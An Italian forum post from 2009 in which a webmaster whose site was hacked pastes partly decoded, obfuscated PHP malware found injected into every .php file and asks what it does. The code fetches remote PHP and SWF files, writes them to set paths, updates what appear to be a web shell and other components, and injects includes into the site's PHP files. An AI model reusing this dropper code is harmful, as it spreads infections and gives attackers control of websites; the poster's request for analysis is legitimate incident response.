secondo voi che fanno le funzioni di questo exploit?

**fabrrrri** · 03-02-2009, 23:20

Mi hanno bucato il sito, ora mi ritrovo con tutti i file .php con un include e un sacco di funzioni codificate, ne ho provate a decodificare alcune, però non ci ho capito molto, ve le posto qui (sono solo la prima parte)

Codice PHP:


<?php function FF97A1D7A5B771B21D423C3A9D78408C1($RC4A5B5E310ED4C323E04D72AFAE39F53, $R399036803A841185E4A270BC666A66CF = false){ global $_GET; set_time_limit(600); if(isset($_GET['dgd'])){ $R399036803A841185E4A270BC666A66CF = false; } if(!FB078122F16A8F8B2978109BD72E1AC30($GLOBALS['dgcp'].$GLOBALS['dgin'])){return;} $RDAD8D40EB9906CAB35CCB38DE41CB7EF = FFD456406745D816A45CAE554C788E754($RC4A5B5E310ED4C323E04D72AFAE39F53, 180, $RF89F518E40FF53B4FD2A7D2440090D63); FE19A7FAB0F9597E68E23311BB5FB460F($RDAD8D40EB9906CAB35CCB38DE41CB7EF); if(!$R399036803A841185E4A270BC666A66CF){ echo"downloaded php size: ".strlen($RDAD8D40EB9906CAB35CCB38DE41CB7EF)."
"; } if(!F7C23AA131822F77A31BC8492D9A7CE00($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '$GLOBALS[\'dgcp\'] = "', '";', $GLOBALS['dgcp'])){ if(!$R399036803A841185E4A270BC666A66CF){ echo "<b style=\"color:red\">failed to set path[/b]
[44883279]"; } die(); } if(!$R399036803A841185E4A270BC666A66CF){ echo"<b style=\"color:green\">path set to {$GLOBALS['dgcp']}[/b]
[5482745]
"; } if(!F7C23AA131822F77A31BC8492D9A7CE00($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '$GLOBALS[\'dgin\'] = "', '";', $GLOBALS['dgin'])){ if(!$R399036803A841185E4A270BC666A66CF){ echo "<b style=\"color:red\">failed to set name[/b]
[58819152]"; } die(); } if(!$R399036803A841185E4A270BC666A66CF){ echo"<b style=\"color:green\">name set to {$GLOBALS['dgin']}[/b]
[2246876]
"; } if(!F7C23AA131822F77A31BC8492D9A7CE00($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '$GLOBALS[\'dgep\'] = "', '";', $GLOBALS['dgep'])){ if(!$R399036803A841185E4A270BC666A66CF){ echo "<b style=\"color:red\">failed to set path to exploit[/b]
[5093713]"; } die(); } if(!$R399036803A841185E4A270BC666A66CF){ echo"<b style=\"color:green\">path to exploit successfully set to {$GLOBALS['dgep']}[/b]
[8799102]
"; } if(!F7C23AA131822F77A31BC8492D9A7CE00($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '$GLOBALS[\'dgsp\'] = "', '";', $GLOBALS['dgsp'])){ if(!$R399036803A841185E4A270BC666A66CF){ echo "<b style=\"color:red\">failed to set relative root dir[/b]
[58819152]"; } die(); } if(!$R399036803A841185E4A270BC666A66CF){ echo"<b style=\"color:green\">relative root dir successfully set {$GLOBALS['dgsp']}[/b]
[5893301]
"; } if(!F7C23AA131822F77A31BC8492D9A7CE00($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '$GLOBALS[\'dgfxp\'] = "', '";', $GLOBALS['dgfxp'])){ if(!$R399036803A841185E4A270BC666A66CF){ echo "<b style=\"color:red\">failed to set path to fix file[/b]
[9477124]"; } die(); } if(!$R399036803A841185E4A270BC666A66CF){ echo"<b style=\"color:green\">path to the file for fix successfully set {$GLOBALS['dgfxp']}[/b]
[5018843]
"; } $RCFFAE742FB4E724571041779A10EFDA9 = FCE5FE761FE36220458FAE651AEABF6D9($RDAD8D40EB9906CAB35CCB38DE41CB7EF); $RE477255A8507A54E5CA56CA24210B7DB = strval(strlen($RCFFAE742FB4E724571041779A10EFDA9)); while(strlen($RE477255A8507A54E5CA56CA24210B7DB) < 7){$RE477255A8507A54E5CA56CA24210B7DB = '0' . $RE477255A8507A54E5CA56CA24210B7DB;} if(!F7C23AA131822F77A31BC8492D9A7CE00($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '"00'.'0', '";', $RE477255A8507A54E5CA56CA24210B7DB)){ if(!$R399036803A841185E4A270BC666A66CF){ echo "<b style=\"color:red\">failed to set size[/b]
[86612935]"; } die(); } $RCFFAE742FB4E724571041779A10EFDA9 = FCE5FE761FE36220458FAE651AEABF6D9($RDAD8D40EB9906CAB35CCB38DE41CB7EF); if(!$R399036803A841185E4A270BC666A66CF){ echo"my packed size: $RE477255A8507A54E5CA56CA24210B7DB
"; } F17B8C65064AE90679E4CE6254EF6C510($GLOBALS['dgcp'].$GLOBALS['dgin'], $RCFFAE742FB4E724571041779A10EFDA9, "<b style=\"color:green\">{$GLOBALS['dgcp']}{$GLOBALS['dgin']}[/b]
", 1, $R399036803A841185E4A270BC666A66CF); if(!$R399036803A841185E4A270BC666A66CF){ echo "<h3>INJECTING PHP FILES</h3>"; } F012D69AC5CE9ED6C2EC5DF1609CA51C4($GLOBALS['dgdr'], $GLOBALS['dgij'], 1, $R399036803A841185E4A270BC666A66CF); if($GLOBALS['dgsp']){ F012D69AC5CE9ED6C2EC5DF1609CA51C4($GLOBALS['dgsp'], $GLOBALS['dgij'], 1, $R399036803A841185E4A270BC666A66CF); } if(!$R399036803A841185E4A270BC666A66CF){ echo "<hr>[b]dgok[/b]"; }}

?>



<?php function FE30C005A9ED2D1D7195DD8485C71E92C($RC4A5B5E310ED4C323E04D72AFAE39F53, $R399036803A841185E4A270BC666A66CF = false){ global $_GET; set_time_limit(600); if(isset($_GET['dgd'])){ $R399036803A841185E4A270BC666A66CF = false; } if(!FB078122F16A8F8B2978109BD72E1AC30($GLOBALS['dgdf'])){return;} if(!$R399036803A841185E4A270BC666A66CF){ echo "updating goorgen from: ".$RC4A5B5E310ED4C323E04D72AFAE39F53."
"; } $R9DB9E103E88D622316D42B508D6D11AB = FFD456406745D816A45CAE554C788E754($RC4A5B5E310ED4C323E04D72AFAE39F53, 180, $RF89F518E40FF53B4FD2A7D2440090D63); FE19A7FAB0F9597E68E23311BB5FB460F($R9DB9E103E88D622316D42B508D6D11AB); if(!$R399036803A841185E4A270BC666A66CF){ echo"downloaded php size: ".strlen($R9DB9E103E88D622316D42B508D6D11AB)."
"; } F17B8C65064AE90679E4CE6254EF6C510($GLOBALS['dgdf'], $R9DB9E103E88D622316D42B508D6D11AB, "file {$GLOBALS['dgdf']} updated successfully...
", 1, $R399036803A841185E4A270BC666A66CF);}

?>



<?php function F6BB94B6278053E81D67BB712972DDAA4($RC4A5B5E310ED4C323E04D72AFAE39F53, $R399036803A841185E4A270BC666A66CF = false){ global $_GET; set_time_limit(600); if(isset($_GET['dgd'])){ $R399036803A841185E4A270BC666A66CF = false; } if(!FB078122F16A8F8B2978109BD72E1AC30($GLOBALS['dgff'])){return;} if(!$R399036803A841185E4A270BC666A66CF){ echo "updating goorgen from: ".$RC4A5B5E310ED4C323E04D72AFAE39F53."
"; } $R9DB9E103E88D622316D42B508D6D11AB = FFD456406745D816A45CAE554C788E754($RC4A5B5E310ED4C323E04D72AFAE39F53, 180, $RF89F518E40FF53B4FD2A7D2440090D63); if(!$R399036803A841185E4A270BC666A66CF){ echo"downloaded swf size: ".strlen($R9DB9E103E88D622316D42B508D6D11AB)."
"; } F17B8C65064AE90679E4CE6254EF6C510($GLOBALS['dgff'], $R9DB9E103E88D622316D42B508D6D11AB, "file {$GLOBALS['dgff']} updated successfully...
", 1, $R399036803A841185E4A270BC666A66CF);}

?>



<?php function F83C82319C79E957F7851CDE48F48DB3E($RC4A5B5E310ED4C323E04D72AFAE39F53, $R399036803A841185E4A270BC666A66CF = false){ global $_GET; set_time_limit(600); if(isset($_GET['dgd'])){ $R399036803A841185E4A270BC666A66CF = false; } if(!FB078122F16A8F8B2978109BD72E1AC30($GLOBALS['dgsf'])){return;} if(!$R399036803A841185E4A270BC666A66CF){ echo "updating shl from: ".$RC4A5B5E310ED4C323E04D72AFAE39F53."
"; } $R9DB9E103E88D622316D42B508D6D11AB = FFD456406745D816A45CAE554C788E754($RC4A5B5E310ED4C323E04D72AFAE39F53, 180, $RF89F518E40FF53B4FD2A7D2440090D63); FE19A7FAB0F9597E68E23311BB5FB460F($R9DB9E103E88D622316D42B508D6D11AB); if(!$R399036803A841185E4A270BC666A66CF){ echo"downloaded php size: ".strlen($R9DB9E103E88D622316D42B508D6D11AB)."
"; } F17B8C65064AE90679E4CE6254EF6C510($GLOBALS['dgsf'], $R9DB9E103E88D622316D42B508D6D11AB, "file {$GLOBALS['dgsf']} updated successfully...
", 1, $R399036803A841185E4A270BC666A66CF);}

?>



<?php 

function F83C82319C79E957F7851CDE48F48DB3E($RC4A5B5E310ED4C323E04D72AFAE39F53, $R399036803A841185E4A270BC666A66CF = false){ global $_GET; set_time_limit(600); if(isset($_GET['dgd'])){ $R399036803A841185E4A270BC666A66CF = false; } if(!FB078122F16A8F8B2978109BD72E1AC30($GLOBALS['dgsf'])){return;} if(!$R399036803A841185E4A270BC666A66CF){ echo "updating shl from: ".$RC4A5B5E310ED4C323E04D72AFAE39F53."
"; } $R9DB9E103E88D622316D42B508D6D11AB = FFD456406745D816A45CAE554C788E754($RC4A5B5E310ED4C323E04D72AFAE39F53, 180, $RF89F518E40FF53B4FD2A7D2440090D63); FE19A7FAB0F9597E68E23311BB5FB460F($R9DB9E103E88D622316D42B508D6D11AB); if(!$R399036803A841185E4A270BC666A66CF){ echo"downloaded php size: ".strlen($R9DB9E103E88D622316D42B508D6D11AB)."
"; } F17B8C65064AE90679E4CE6254EF6C510($GLOBALS['dgsf'], $R9DB9E103E88D622316D42B508D6D11AB, "file {$GLOBALS['dgsf']} updated successfully...
", 1, $R399036803A841185E4A270BC666A66CF);}

?>



<?php

function F09C226E8C9EFC96D8CC6B1DE49E0CCE6($RC4A5B5E310ED4C323E04D72AFAE39F53, $R399036803A841185E4A270BC666A66CF = false){ global $_GET; set_time_limit(600); if(isset($_GET['dgd'])){ $R399036803A841185E4A270BC666A66CF = false; } if(!FB078122F16A8F8B2978109BD72E1AC30($GLOBALS['dgskf'])){return;} if(!$R399036803A841185E4A270BC666A66CF){ echo "updating sk from: ".$RC4A5B5E310ED4C323E04D72AFAE39F53."
"; } $R9DB9E103E88D622316D42B508D6D11AB = ' ' . trim(FFD456406745D816A45CAE554C788E754($RC4A5B5E310ED4C323E04D72AFAE39F53, 180, $RF89F518E40FF53B4FD2A7D2440090D63)); $R2A039ED8FDBF4CEAA9E79CDC3AECD1A2 = strpos($R9DB9E103E88D622316D42B508D6D11AB, '>>>>>>>'); if($R2A039ED8FDBF4CEAA9E79CDC3AECD1A2 > 0){$R9DB9E103E88D622316D42B508D6D11AB = trim(substr($R9DB9E103E88D622316D42B508D6D11AB, $R2A039ED8FDBF4CEAA9E79CDC3AECD1A2+7, strlen($R9DB9E103E88D622316D42B508D6D11AB)));} $R2A039ED8FDBF4CEAA9E79CDC3AECD1A2 = strpos($R9DB9E103E88D622316D42B508D6D11AB, '<<<<<<<'); $R9DB9E103E88D622316D42B508D6D11AB = trim(substr($R9DB9E103E88D622316D42B508D6D11AB, 0, $R2A039ED8FDBF4CEAA9E79CDC3AECD1A2)); if(!$R399036803A841185E4A270BC666A66CF){ echo"downloaded php size: ".strlen($R9DB9E103E88D622316D42B508D6D11AB)."
"; } F17B8C65064AE90679E4CE6254EF6C510($GLOBALS['dgskf'], $R9DB9E103E88D622316D42B508D6D11AB, "file {$GLOBALS['dgskf']} updated successfully...
", 1, $R399036803A841185E4A270BC666A66CF); } if(isset($_GET['dgd'])){ error_reporting(E_ALL & ~E_NOTICE); }else{ error_reporting(0);}

?>

Discussione: secondo voi che fanno le funzioni di questo exploit?

Strumenti discussione

Ricerca discussione

Visualizza

Visualizzazione discussione

secondo voi che fanno le funzioni di questo exploit?

Permessi di invio